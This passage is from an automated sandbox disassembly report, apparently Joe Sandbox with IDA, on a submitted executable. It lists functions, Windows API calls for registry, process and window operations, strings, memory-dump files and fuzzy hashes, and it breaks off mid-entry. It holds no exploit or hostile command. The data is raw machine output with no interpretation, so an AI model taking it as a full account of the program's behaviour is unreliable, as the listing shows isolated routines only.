                                                              • Instruction ID: 70f1b87d61da224d62710df7b73269fe50aeac3da3586fb6890782a867238cc3
                                                              • Opcode Fuzzy Hash: 6aa425c24467b677cae78a7f8b5510ad1b812b95a30953a1a55e99da13bc319f
                                                              • Instruction Fuzzy Hash: FF41C3723002059BEB059F648D84BA6B7ACFF41324FD48469ED0B9A186DB758A65CBB0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 861 401c2e-401c4e call 402bac * 2 866 401c50-401c57 call 402bce 861->866 867 401c5a-401c5e 861->867 866->867 869 401c60-401c67 call 402bce 867->869 870 401c6a-401c70 867->870 869->870 873 401c72-401c8e call 402bac * 2 870->873 874 401cbe-401ce4 call 402bce * 2 FindWindowExA 870->874 884 401c90-401cac SendMessageTimeoutA 873->884 885 401cae-401cbc SendMessageA 873->885 886 401cea 874->886 887 401ced-401cf0 884->887 885->886 886->887 888 401cf6 887->888 889 402a5a-402a69 887->889 888->889
                                                              APIs
                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                              • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                              • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                              • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 892 402476-4024a7 call 402bce * 2 call 402c5e 899 402a5a-402a69 892->899 900 4024ad-4024b7 892->900 902 4024c7-4024ca 900->902 903 4024b9-4024c6 call 402bce lstrlenA 900->903 906 4024e1-4024e4 902->906 907 4024cc-4024e0 call 402bac 902->907 903->902 910 4024f5-402509 RegSetValueExA 906->910 911 4024e6-4024f0 call 4030d8 906->911 907->906 912 40250b 910->912 913 40250e-4025eb RegCloseKey 910->913 911->910 912->913 913->899
                                                              APIs
                                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp,?,?,?), ref: 004024C1
                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp,00000000,?,?), ref: 00402501
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp,00000000,?,?), ref: 004025E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp
                                                              • API String ID: 2655323295-2597382594
                                                              • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                              • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                              • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                              • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                              APIs
                                                              • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 004020C8
                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                              • LoadLibraryExA.KERNELBASE(00000000,?,?,?,000000F0), ref: 004020D8
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,?,000000F0), ref: 00402152
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2987980305-0
                                                              • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                              • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                              • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                              • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                              APIs
                                                                • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,000000F0), ref: 0040160D
                                                                • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405727
                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                              Strings
                                                              • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\tranchet\Trykmaalere
                                                              • API String ID: 1892508949-2000945231
                                                              • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                              • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                              • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                              • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                              APIs
                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,?,Call,?,00406293,80000002), ref: 00406024
                                                              • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3356406503-1824292864
                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                              • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                              • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                              • CloseHandle.KERNEL32(?), ref: 004057CC
                                                              Strings
                                                              • Error launching installer, xrefs: 004057A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                              • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                              • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                              • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                              APIs
                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp,00000000,?,?), ref: 004025E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseValue
                                                              • String ID:
                                                              • API String ID: 397863658-0
                                                              • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                              • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                              • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                              • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsi2E71.tmp,00000000,?,?), ref: 004025E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID:
                                                              • API String ID: 3356406503-0
                                                              • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                              • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                              • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                              • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                              • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                              • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                              • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                              APIs
                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,?), ref: 00402442
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                              • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                              • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                              • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                              APIs
                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                              • String ID:
                                                              • API String ID: 1938659011-0
                                                              • Opcode ID: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                              • Instruction ID: c1865f8cc46f1228928c2992524d711605dd36016a3aefe194dc66e9efe750da
                                                              • Opcode Fuzzy Hash: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                              • Instruction Fuzzy Hash: 24F08231705201DBCB20DF769D04A9BBFA4EF91354B10803BE145F6190D6788502CA68
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                              • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                              • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                              • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,?,?,004033BB,?), ref: 00406512
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004064F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
